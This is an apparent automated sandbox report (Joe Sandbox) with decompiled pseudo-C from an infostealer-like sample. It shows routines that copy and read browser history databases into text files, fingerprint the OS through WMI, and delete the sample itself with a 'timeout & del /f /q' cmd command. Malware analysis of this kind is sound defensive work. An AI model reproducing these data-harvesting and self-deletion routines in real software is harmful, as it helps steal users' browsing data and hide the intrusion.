                                        					_t64 = lstrlenA(_t100);
                                        					_t83 = _v560;
                                        					if(_t83 != 0) {
                                        						__eflags =  *_t83 - 2;
                                        						if( *_t83 == 2) {
                                        							 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t83 + 4)), _t100,  &_v540, _t64, 3);
                                        						} else {
                                        							 *0x29dd8814 = 0x80000;
                                        						}
                                        					} else {
                                        						 *0x29dd8814 = 0x10000;
                                        					}
                                        					goto L11;
                                        				} else {
                                        					goto L5;
                                        				}
                                        				do {
                                        					L5:
                                        					 *0x29dd8334(_v544, 0);
                                        					lstrcatA(_t100,  *0x29dd8334(_v544, 0));
                                        					lstrcatA(_t100, "\n");
                                        					_t71 =  *0x29dd8314(_v544);
                                        					_t108 = _t108 + 0x14;
                                        				} while (_t71 == 0x64);
                                        				goto L6;
                                        			}

                                        APIs
                                        • _memset.LIBCMT ref: 29D9A5A8
                                        • lstrcatA.KERNEL32(?,015A1F98,?,?,?), ref: 29D9A5BE
                                        • _malloc.LIBCMT ref: 29D9A5C6
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D9A5D3
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D9A5E7
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D9A5FC
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 29D9A614
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9A624
                                        • _memset.LIBCMT ref: 29D9A637
                                        • wsprintfA.USER32 ref: 29D9A659
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9A6AD
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D9A6B4
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9A6F4
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9A700
                                        • lstrlenA.KERNEL32(00000000), ref: 29D9A71C
                                        • DeleteFileA.KERNEL32(?), ref: 29D9A789
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$File__getptd_memsetwsprintf$AllocAllocateCopyCountDeleteProcessTick_malloc_randlstrlen
                                        • String ID: %s%d$\History\%s_%s.txt
                                        • API String ID: 3817689429-211420586
                                        • Opcode ID: 526e7a2ba9a455bd6c4d9cb89e172e106bcfe17741946241f41c4995258cccad
                                        • Instruction ID: 253dedb0eacc4edff1ed200b106d0999327cd515183857ae0b22b2222d5a139c
                                        • Opcode Fuzzy Hash: 526e7a2ba9a455bd6c4d9cb89e172e106bcfe17741946241f41c4995258cccad
                                        • Instruction Fuzzy Hash: 1A5108B3941248ABD711EBA4EC49FDA7778EF58B01F00819CF50AD7140DA389A81EFB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 57%
                                        			E29D9B0A0(CHAR* __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4) {
                                        				signed int _v8;
                                        				char _v276;
                                        				char _v540;
                                        				char _v544;
                                        				char _v548;
                                        				intOrPtr _v552;
                                        				intOrPtr _v556;
                                        				intOrPtr* _v560;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t33;
                                        				signed int _t34;
                                        				signed int _t42;
                                        				void* _t52;
                                        				long _t56;
                                        				void* _t62;
                                        				int _t63;
                                        				void* _t69;
                                        				CHAR* _t72;
                                        				intOrPtr* _t80;
                                        				void* _t92;
                                        				void* _t93;
                                        				void* _t94;
                                        				CHAR* _t95;
                                        				CHAR* _t96;
                                        				signed int _t97;
                                        				void* _t98;
                                        				void* _t101;
                                        				void* _t103;
                                        				void* _t104;
                                        				signed int _t108;
                                        
                                        				_t70 = __ebx;
                                        				_t33 =  *0x29dd5664; // 0xd9555f04
                                        				_t34 = _t33 ^ _t97;
                                        				_t108 = _t34;
                                        				_v8 = _t34;
                                        				_v556 = _a4;
                                        				_v552 = __ecx;
                                        				_v560 = __edx;
                                        				E29DB5640( &_v276, 0, 0x104);
                                        				_t72 =  *0x29dd8098; // 0x15a1f98
                                        				lstrcatA( &_v276, _t72);
                                        				_t95 = E29DADFE0( &_v276, _t92, _t94, 0x1a);
                                        				 *_t95 = 0;
                                        				E29DAFCE4(GetTickCount());
                                        				_t101 = _t98 + 0x14;
                                        				_t93 = 0x1a;
                                        				do {
                                        					_t42 = E29DAFCF6(_t108);
                                        					asm("cdq");
                                        					_push(_t42 % 0xa);
                                        					_push(_t95);
                                        					wsprintfA(_t95, "%s%d");
                                        					_t101 = _t101 + 0x10;
                                        					_t93 = _t93 - 1;
                                        				} while (_t93 != 0);
                                        				_t95[0x1a] = 0;
                                        				lstrcatA( &_v276, _t95);
                                        				CopyFileA(__ebx,  &_v276, 1);
                                        				E29DB5640( &_v540, _t93, 0x104);
                                        				wsprintfA( &_v540, "\\History\\%s_%s.txt", _v552, _v556);
                                        				_t96 =  *0x29dd7cf0; // 0x15971a0
                                        				_t88 =  &_v548;
                                        				_t52 =  *0x29dd8344( &_v276,  &_v548);
                                        				_t103 = _t101 + 0x24;
                                        				if(_t52 != 0) {
                                        					L12:
                                        					return E29DADF46(DeleteFileA( &_v276), _t70, _v8 ^ _t97, _t88, _t93, _t96);
                                        				}
                                        				_t56 =  *0x29dd82f8(_v548, _t96, 0xffffffff,  &_v544, _t52);
                                        				_t104 = _t103 + 0x14;
                                        				if(_t56 != 0) {
                                        					L11:
                                        					 *0x29dd8318(_v544);
                                        					_t88 = _v548;
                                        					 *0x29dd8348(_v548);
                                        					goto L12;
                                        				}
                                        				_t96 = HeapAlloc(GetProcessHeap(), _t56, 0xf423f);
                                        				_t62 =  *0x29dd8314(_v544);
                                        				_t104 = _t104 + 4;
                                        				if(_t62 != 0x64) {
                                        					L6:
                                        					_t63 = lstrlenA(_t96);
                                        					_t80 = _v560;
                                        					if(_t80 != 0) {
                                        						__eflags =  *_t80 - 2;
                                        						if( *_t80 == 2) {
                                        							 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t80 + 4)), _t96,  &_v540, _t63, 3);
                                        						} else {
                                        							 *0x29dd8814 = 0x80000;
                                        						}
                                        					} else {
                                        						 *0x29dd8814 = 0x10000;
                                        					}
                                        					goto L11;
                                        				} else {
                                        					goto L5;
                                        				}
                                        				do {
                                        					L5:
                                        					lstrcatA(_t96,  *0x29dd8334(_v544, 0));
                                        					lstrcatA(_t96, "\n");
                                        					_t69 =  *0x29dd8314(_v544);
                                        					_t104 = _t104 + 0xc;
                                        				} while (_t69 == 0x64);
                                        				goto L6;
                                        			}

                                        APIs
                                        • _memset.LIBCMT ref: 29D9B0D8
                                        • lstrcatA.KERNEL32(?,015A1F98,?,?), ref: 29D9B0EE
                                        • _malloc.LIBCMT ref: 29D9B0F6
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D9B103
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D9B117
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D9B12C
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 29D9B144
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9B154
                                        • _memset.LIBCMT ref: 29D9B167
                                        • wsprintfA.USER32 ref: 29D9B189
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9B1DD
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D9B1E4
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9B215
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9B221
                                        • lstrlenA.KERNEL32(00000000), ref: 29D9B23D
                                        • DeleteFileA.KERNEL32(?), ref: 29D9B2AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$File__getptd_memsetwsprintf$AllocAllocateCopyCountDeleteProcessTick_malloc_randlstrlen
                                        • String ID: %s%d$\History\%s_%s.txt
                                        • API String ID: 3817689429-211420586
                                        • Opcode ID: dbc053420a8ab348fdf2e7970f8503c0d38c7ff47c691652a7e9e842671b1822
                                        • Instruction ID: 05ba0d8feab2beb6768a22b5c6c12d75aa2ffce87d1fd00616986d5911293356
                                        • Opcode Fuzzy Hash: dbc053420a8ab348fdf2e7970f8503c0d38c7ff47c691652a7e9e842671b1822
                                        • Instruction Fuzzy Hash: 9C5107B2941258ABD711EBA4EC49FDF7778EF48B01F00819DF509D6200DA389A85DFB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 65%
                                        			E29D8EFB8(char __ebx, intOrPtr* __esi) {
                                        				intOrPtr* _t109;
                                        				WCHAR* _t114;
                                        				signed char _t115;
                                        				intOrPtr _t117;
                                        				char _t118;
                                        				void* _t121;
                                        				intOrPtr* _t122;
                                        				intOrPtr* _t130;
                                        				CHAR* _t143;
                                        				CHAR* _t146;
                                        				CHAR* _t151;
                                        				char _t157;
                                        				void* _t158;
                                        				intOrPtr _t159;
                                        				CHAR* _t165;
                                        				intOrPtr _t166;
                                        				intOrPtr _t174;
                                        				CHAR* _t177;
                                        				intOrPtr _t178;
                                        				CHAR* _t193;
                                        				void* _t197;
                                        				void* _t203;
                                        				intOrPtr _t204;
                                        				void* _t205;
                                        				intOrPtr* _t209;
                                        				void* _t210;
                                        				CHAR* _t212;
                                        				signed int _t213;
                                        				void* _t215;
                                        				void* _t216;
                                        				void* _t218;
                                        				void* _t219;
                                        				void* _t220;
                                        
                                        				_t209 = __esi;
                                        				_t157 = __ebx;
                                        				 *(_t213 - 0xb90) = __ebx;
                                        				E29DB5640();
                                        				_t216 = _t215 + 0xc;
                                        				lstrcatA(_t213 - 0x224, _t213 - 0x00000afc & (0 |  *0x29dd8500(__ebx, 0x1a, __ebx, __ebx, _t213 - 0xafc) < 0x00000000) - 0x00000001);
                                        				_t193 =  *0x29dd7dbc; // 0x15a2250
                                        				lstrcatA(_t213 - 0x224, _t193);
                                        				lstrcatA(_t213 - 0x11c, _t213 - 0x224);
                                        				lstrcatA(_t213 - 0x11c, "\\");
                                        				_t165 =  *0x29dd7d54; // 0x15a1fe0
                                        				_t195 = _t213 - 0x11c;
                                        				lstrcatA(_t213 - 0x11c, _t165);
                                        				_t109 = _t213 - 0x11c;
                                        				 *((intOrPtr*)(_t213 - 0xb3c)) = 0xf;
                                        				 *((intOrPtr*)(_t213 - 0xb40)) = __ebx;
                                        				 *((char*)(_t213 - 0xb50)) = __ebx;
                                        				_t203 = _t109 + 1;
                                        				do {
                                        					_t166 =  *_t109;
                                        					_t109 = _t109 + 1;
                                        				} while (_t166 != __ebx);
                                        				E29D892C0(_t213 - 0xb50, _t213 - 0x11c, _t109 - _t203);
                                        				 *((intOrPtr*)(_t213 - 4)) = __ebx;
                                        				_t114 = E29DA4990(_t213 - 0xb50, _t213 - 0xb6c, _t213 - 0xb6c);
                                        				if(_t114[0xa] >= 8) {
                                        					_t114 =  *_t114;
                                        				}
                                        				_t115 = GetFileAttributesW(_t114);
                                        				if(_t115 == 0xffffffff || (_t115 & 0x00000010) != 0) {
                                        					_t204 = 0;
                                        					__eflags = 0;
                                        				} else {
                                        					_t204 = 1;
                                        				}
                                        				if( *((intOrPtr*)(_t213 - 0xb58)) >= 8) {
                                        					_t195 =  *(_t213 - 0xb6c);
                                        					_push( *(_t213 - 0xb6c));
                                        					E29DADF3B();
                                        					_t216 = _t216 + 4;
                                        				}
                                        				 *((intOrPtr*)(_t213 - 4)) = 0xffffffff;
                                        				 *((intOrPtr*)(_t213 - 0xb58)) = 7;
                                        				 *((intOrPtr*)(_t213 - 0xb5c)) = _t157;
                                        				 *(_t213 - 0xb6c) = 0;
                                        				if( *((intOrPtr*)(_t213 - 0xb3c)) >= 0x10) {
                                        					_push( *((intOrPtr*)(_t213 - 0xb50)));
                                        					E29DADF3B();
                                        					_t216 = _t216 + 4;
                                        				}
                                        				 *((intOrPtr*)(_t213 - 0xb3c)) = 0xf;
                                        				 *((intOrPtr*)(_t213 - 0xb40)) = _t157;
                                        				 *((char*)(_t213 - 0xb50)) = _t157;
                                        				if(_t204 != _t157) {
                                        					_t195 = _t213 - 0xb90;
                                        					_t121 = E29D99300(_t213 - 0xb8c, _t213 - 0xb90, _t213 - 0x11c);
                                        					_t218 = _t216 + 4;
                                        					if(_t121 != 0) {
                                        						_t122 = _t209;
                                        						 *((intOrPtr*)(_t213 - 0xb20)) = 0xf;
                                        						 *((intOrPtr*)(_t213 - 0xb24)) = _t157;
                                        						 *((char*)(_t213 - 0xb34)) = _t157;
                                        						_t197 = _t122 + 1;
                                        						do {
                                        							_t174 =  *_t122;
                                        							_t122 = _t122 + 1;
                                        							_t233 = _t174 - _t157;
                                        						} while (_t174 != _t157);
                                        						E29D892C0(_t213 - 0xb34, _t209, _t122 - _t197);
                                        						 *((intOrPtr*)(_t213 - 4)) = 1;
                                        						E29DA44D0(_t197, _t233, _t213 - 0xb18, _t213 - 0xb34);
                                        						_t219 = _t218 + 8;
                                        						 *((char*)(_t213 - 4)) = 3;
                                        						if( *((intOrPtr*)(_t213 - 0xb20)) >= 0x10) {
                                        							_push( *((intOrPtr*)(_t213 - 0xb34)));
                                        							E29DADF3B();
                                        							_t219 = _t219 + 4;
                                        						}
                                        						 *((intOrPtr*)(_t213 - 0xb20)) = 0xf;
                                        						 *((intOrPtr*)(_t213 - 0xb24)) = _t157;
                                        						 *((char*)(_t213 - 0xb34)) = _t157;
                                        						E29DB5640(_t213 - 0x32c, _t157, 0x104);
                                        						_t177 =  *0x29dd7a94; // 0x15a2238
                                        						_t220 = _t219 + 0xc;
                                        						lstrcatA(_t213 - 0x32c, _t177);
                                        						_t130 = _t213 - 0x32c;
                                        						_t195 = _t130 + 1;
                                        						do {
                                        							_t178 =  *_t130;
                                        							_t130 = _t130 + 1;
                                        						} while (_t178 != _t157);
                                        						if(E29D95240(0, _t213 - 0xb18, _t213 - 0x32c, _t130 - _t195) != 0xffffffff) {
                                        							E29D896C0(_t213 - 0xb18, _t157, _t134 + 0xc);
                                        							E29D896C0(_t213 - 0xb18, 0x8c, 0xffffffff);
                                        							_t159 =  *((intOrPtr*)(_t213 - 0xb18));
                                        							if( *((intOrPtr*)(_t213 - 0xb04)) < 0x10) {
                                        								_t159 = _t213 - 0xb18;
                                        							}
                                        							if(E29D991B0(_t213 - 0xb94, _t159, _t213 - 0xb98) != 0) {
                                        								E29DB5640(_t213 - 0x714, 0, 0x3e8);
                                        								_t208 =  *((intOrPtr*)(_t213 - 0xb98));
                                        								_t143 = E29D99510(_t213 - 0xb88,  *((intOrPtr*)(_t213 - 0xb98)),  *(_t213 - 0xb94),  *((intOrPtr*)(_t213 - 0xb8c)),  *(_t213 - 0xb90));
                                        								_t220 = _t220 + 0x14;
                                        								 *((char*)(_t213 - 4)) = 4;
                                        								if(_t143[0x14] >= 0x10) {
                                        									_t143 =  *_t143;
                                        								}
                                        								_t195 = _t213 - 0x714;
                                        								lstrcatA(_t213 - 0x714, _t143);
                                        								 *((char*)(_t213 - 4)) = 3;
                                        								E29D89160(_t213 - 0xb88);
                                        								_t146 =  *0x29dd7f1c; // 0x15a23b8
                                        								_t212 =  *(_t213 - 0xb9c);
                                        								lstrcatA(_t212, _t146);
                                        								_push("NULL");
                                        								_push(_t213 - 0x714);
                                        								if( *0x29dd8550() != 0) {
                                        									_t195 =  *(_t213 - 0xb94);
                                        									_t151 = E29D99510(_t213 - 0xb88, _t208,  *(_t213 - 0xb94),  *((intOrPtr*)(_t213 - 0xb8c)),  *(_t213 - 0xb90));
                                        									_t220 = _t220 + 8;
                                        									 *((char*)(_t213 - 4)) = 5;
                                        									if(_t151[0x14] >= 0x10) {
                                        										_t151 =  *_t151;
                                        									}
                                        									lstrcatA(_t212, _t151);
                                        									 *((char*)(_t213 - 4)) = 3;
                                        									E29D89160(_t213 - 0xb88);
                                        								}
                                        								lstrcatA(_t212, "\n");
                                        							}
                                        							_t157 = 0;
                                        						}
                                        						 *((intOrPtr*)(_t213 - 4)) = 0xffffffff;
                                        						if( *((intOrPtr*)(_t213 - 0xb04)) >= 0x10) {
                                        							_push( *((intOrPtr*)(_t213 - 0xb18)));
                                        							E29DADF3B();
                                        						}
                                        						 *((intOrPtr*)(_t213 - 0xb04)) = 0xf;
                                        						 *((intOrPtr*)(_t213 - 0xb08)) = _t157;
                                        						 *((char*)(_t213 - 0xb18)) = _t157;
                                        					}
                                        				}
                                        				_t117 =  *((intOrPtr*)(_t213 - 0xb8c));
                                        				if(_t117 != _t157) {
                                        					 *0x29dd8464(_t117, _t157);
                                        					 *((intOrPtr*)(_t213 - 0xb8c)) = _t157;
                                        				}
                                        				_t118 =  *(_t213 - 0xb90);
                                        				if(_t118 != _t157) {
                                        					_t118 =  *0x29dd8518(_t118);
                                        				}
                                        				 *[fs:0x0] =  *((intOrPtr*)(_t213 - 0xc));
                                        				_pop(_t205);
                                        				_pop(_t210);
                                        				_pop(_t158);
                                        				return E29DADF46(_t118, _t158,  *(_t213 - 0x14) ^ _t213, _t195, _t205, _t210);
                                        			}

                                        APIs
                                        • _memset.LIBCMT ref: 29D8EFBE
                                        • SHGetFolderPathA.SHELL32(?,0000001A,?,?,?), ref: 29D8EFD2
                                        • lstrcatA.KERNEL32(?,?,?,0000001A,?,?,?), ref: 29D8EFF0
                                        • lstrcatA.KERNEL32(?,015A2250,?,0000001A,?,?,?), ref: 29D8F004
                                        • lstrcatA.KERNEL32(?,?,?,0000001A,?,?,?), ref: 29D8F018
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,0000001A,?,?,?), ref: 29D8F02A
                                        • lstrcatA.KERNEL32(?,015A1FE0,?,0000001A,?,?,?), ref: 29D8F03E
                                        • GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 29D8F09D
                                        • _memset.LIBCMT ref: 29D8F1D4
                                        • lstrcatA.KERNEL32(?,015A2238,?,?,?,?,?,?), ref: 29D8F1EA
                                        • _memset.LIBCMT ref: 29D8F285
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 29D8F2CB
                                        • lstrcatA.KERNEL32(?,015A23B8,?,?,?,?,?), ref: 29D8F2ED
                                        • StrCmpCA.SHLWAPI(?,NULL,?,?,?,?,?), ref: 29D8F2FF
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 29D8F33B
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,?,?), ref: 29D8F356
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$_memset$AttributesFileFolderPath
                                        • String ID: NULL
                                        • API String ID: 3917447719-324932091
                                        • Opcode ID: 1cb7e9aa88b80ee2d6198be1f1f60bfb21cb3ebf20c9b95336199d8e7f9fe3a8
                                        • Instruction ID: f6217ceb4c9396e77cfb900c7fd9b6cc45df6892206976ce3c05e8032b3f05fa
                                        • Opcode Fuzzy Hash: 1cb7e9aa88b80ee2d6198be1f1f60bfb21cb3ebf20c9b95336199d8e7f9fe3a8
                                        • Instruction Fuzzy Hash: 1EB190B2910258AFDB25DF64CC94BDEB779BF54308F0081E9D109A7581DB349B86DFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 69%
                                        			E29DA4E60() {
                                        				int _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				char _v280;
                                        				intOrPtr _v288;
                                        				int _v292;
                                        				char _v308;
                                        				int _v336;
                                        				int _v340;
                                        				int _v344;
                                        				CHAR* _v348;
                                        				CHAR* _v352;
                                        				CHAR* _v356;
                                        				int _v360;
                                        				int _v364;
                                        				char _v368;
                                        				signed int _t32;
                                        				signed int _t33;
                                        				CHAR* _t42;
                                        				void* _t60;
                                        				signed int _t64;
                                        				void* _t65;
                                        				void* _t68;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC1FBB);
                                        				_push( *[fs:0x0]);
                                        				_t32 =  *0x29dd5664; // 0xd9555f04
                                        				_t33 = _t32 ^ _t64;
                                        				_v20 = _t33;
                                        				_push(_t33);
                                        				 *[fs:0x0] =  &_v16;
                                        				E29DB5640( &_v280, 0, 0x104);
                                        				E29DB5640( &_v368, 0, 0x3c);
                                        				lstrcatA( &_v280, "/c ");
                                        				lstrcatA( &_v280, "timeout /t 6 & del /f /q \"");
                                        				_t42 = E29DA4BA0(0, _t60,  &_v308, GetCurrentProcessId());
                                        				_t68 = _t65 - 0x160 + 0x1c;
                                        				_v8 = 0;
                                        				if(_t42[0x14] >= 0x10) {
                                        					_t42 =  *_t42;
                                        				}
                                        				lstrcatA( &_v280, _t42);
                                        				_v8 = 0xffffffff;
                                        				if(_v288 >= 0x10) {
                                        					_push(_v308);
                                        					E29DADF3B();
                                        					_t68 = _t68 + 4;
                                        				}
                                        				_v288 = 0xf;
                                        				_v292 = 0;
                                        				_v308 = 0;
                                        				lstrcatA( &_v280, "\" & exit");
                                        				_v368 = 0x3c;
                                        				_v364 = 0;
                                        				_v360 = 0;
                                        				_v356 = "open";
                                        				_v352 = "C:\\Windows\\System32\\cmd.exe";
                                        				_v348 =  &_v280;
                                        				_v344 = 0;
                                        				_v340 = 0;
                                        				_v336 = 0;
                                        				 *0x29dd8584( &_v368);
                                        				E29DB5640( &_v368, 0, 0x3c);
                                        				E29DB5640( &_v280, 0, 0x104);
                                        				ExitProcess(0);
                                        			}

                                        APIs
                                        • _memset.LIBCMT ref: 29DA4E9C
                                        • _memset.LIBCMT ref: 29DA4EAB
                                        • lstrcatA.KERNEL32(?,/c ,?,?,?,D9555F04), ref: 29DA4EBF
                                        • lstrcatA.KERNEL32(?,timeout /t 6 & del /f /q ",?,?,?,D9555F04), ref: 29DA4ED1
                                        • GetCurrentProcessId.KERNEL32(?,?,?,D9555F04), ref: 29DA4ED7
                                          • Part of subcall function 29DA4BA0: OpenProcess.KERNEL32(00000410,00000000,29D92FA7,00000010), ref: 29DA4BC9
                                          • Part of subcall function 29DA4BA0: GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 29DA4BE4
                                          • Part of subcall function 29DA4BA0: CloseHandle.KERNEL32(00000000), ref: 29DA4BEB
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,D9555F04), ref: 29DA4F03
                                        • lstrcatA.KERNEL32(?," & exit,?,?,?,?,D9555F04), ref: 29DA4F49
                                        • ShellExecuteEx.SHELL32(D9555F04), ref: 29DA4F9E
                                        • _memset.LIBCMT ref: 29DA4FAE
                                        • _memset.LIBCMT ref: 29DA4FC0
                                        • ExitProcess.KERNEL32 ref: 29DA4FC9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memsetlstrcat$Process$CloseCurrentExecuteExitFileHandleModuleNameOpenShell
                                        • String ID: " & exit$/c $<$C:\Windows\System32\cmd.exe$open$timeout /t 6 & del /f /q "
                                        • API String ID: 790161300-266446750
                                        • Opcode ID: 3586d598e1c7df207d94fab30b10477dd05e75a7bd1cc7e158b7d7e60bc69603
                                        • Instruction ID: a3441af988ed17a5d42af8df28dc4a0ce43570775818588737099910efa7102c
                                        • Opcode Fuzzy Hash: 3586d598e1c7df207d94fab30b10477dd05e75a7bd1cc7e158b7d7e60bc69603
                                        • Instruction Fuzzy Hash: 7F3139B2C01268AFDB25DF54DC84FDAB778BB18B00F4042E9E209A6640D7345B85DFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 15%
                                        			E29DA3DF0() {
                                        				char _v8;
                                        				char _v16;
                                        				intOrPtr _v20;
                                        				signed int _v24;
                                        				struct _SYSTEMTIME _v40;
                                        				intOrPtr _v48;
                                        				long _v52;
                                        				char _v68;
                                        				void* _v72;
                                        				void* _v76;
                                        				void* _v80;
                                        				void* _v84;
                                        				char _v88;
                                        				intOrPtr _v100;
                                        				char _v108;
                                        				char _v116;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t46;
                                        				signed int _t47;
                                        				intOrPtr* _t50;
                                        				CHAR* _t53;
                                        				intOrPtr* _t55;
                                        				intOrPtr* _t57;
                                        				intOrPtr* _t60;
                                        				void* _t72;
                                        				void* _t74;
                                        				intOrPtr _t90;
                                        				void* _t96;
                                        				void* _t97;
                                        				void* _t98;
                                        				void* _t99;
                                        				FILETIME* _t100;
                                        				CHAR* _t101;
                                        				signed int _t102;
                                        				void* _t103;
                                        
                                        				_t46 =  *0x29dd5664; // 0xd9555f04
                                        				_t47 = _t46 ^ _t102;
                                        				_v24 = _t47;
                                        				 *[fs:0x0] =  &_v16;
                                        				_v20 = _t103 - 0x64;
                                        				_v8 = 0;
                                        				__imp__CoInitializeEx(0, 0, _t47, _t96, _t98, _t72,  *[fs:0x0], E29DC1CC0, 0xffffffff);
                                        				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                        				_v84 = 0;
                                        				__imp__CoCreateInstance(0x29dc54f0, 0, 1, 0x29dc5420,  &_v84);
                                        				_t50 = _v84;
                                        				_t89 =  &_v72;
                                        				_push( &_v72);
                                        				_push(0);
                                        				_push(0);
                                        				_push(0);
                                        				_push(0);
                                        				_push(0);
                                        				_push(0);
                                        				_v72 = 0;
                                        				_push(L"ROOT\\CIMV2");
                                        				_push(_t50);
                                        				if( *((intOrPtr*)( *((intOrPtr*)( *_t50 + 0xc))))() < 0) {
                                        					L5:
                                        					_t53 = "Unknown";
                                        				} else {
                                        					__imp__CoSetProxyBlanket(_v72, 0xa, 0, 0, 3, 3, 0, 0);
                                        					_t55 = _v72;
                                        					_push( &_v80);
                                        					_push(0);
                                        					_push(0x20);
                                        					_push(L"Select * From Win32_OperatingSystem");
                                        					_v80 = 0;
                                        					_t90 =  *_t55;
                                        					_t89 =  *(_t90 + 0x50);
                                        					_push(L"WQL");
                                        					_push(_t55);
                                        					if( *( *(_t90 + 0x50))() < 0) {
                                        						goto L5;
                                        					} else {
                                        						_v76 = 0;
                                        						_v88 = 0;
                                        						_v48 = 0xf;
                                        						_v52 = 0;
                                        						_v68 = 0;
                                        						_v8 = 1;
                                        						_t57 = _v80;
                                        						if(_t57 == 0) {
                                        							goto L5;
                                        						} else {
                                        							_t89 =  &_v76;
                                        							 *((intOrPtr*)( *((intOrPtr*)( *_t57 + 0x10))))(_t57, 0xffffffff, 1,  &_v76,  &_v88);
                                        							if(_v88 == 0) {
                                        								goto L5;
                                        							} else {
                                        								__imp__#8( &_v108);
                                        								_v8 = 2;
                                        								_t60 = _v76;
                                        								 *((intOrPtr*)( *((intOrPtr*)( *_t60 + 0x10))))(_t60, L"InstallDate", 0,  &_v108, 0, 0);
                                        								_t100 =  &_v116;
                                        								E29DA3D50(_t100, _v100);
                                        								FileTimeToSystemTime(_t100,  &_v40);
                                        								_t101 = HeapAlloc(GetProcessHeap(), 0, 0x104);
                                        								_t89 = _v40.wDay & 0x0000ffff;
                                        								wsprintfA(_t101, "%d/%d/%d %d:%d:%d", _v40.wDay & 0x0000ffff, _v40.wMonth & 0x0000ffff, _v40.wYear & 0x0000ffff, _v40.wHour & 0x0000ffff, _v40.wMinute & 0x0000ffff, _v40.wSecond & 0x0000ffff);
                                        								__imp__#9( &_v108);
                                        								E29D89160( &_v68);
                                        								_t53 = _t101;
                                        							}
                                        						}
                                        					}
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t97);
                                        				_pop(_t99);
                                        				_pop(_t74);
                                        				return E29DADF46(_t53, _t74, _v24 ^ _t102, _t89, _t97, _t99);
                                        			}


                                        APIs
                                        • CoInitializeEx.OLE32(00000000,00000000,D9555F04,00000010,0000000F,00000000), ref: 29DA3E25
                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 29DA3E36
                                        • CoCreateInstance.OLE32(29DC54F0,00000000,00000001,29DC5420,?), ref: 29DA3E50
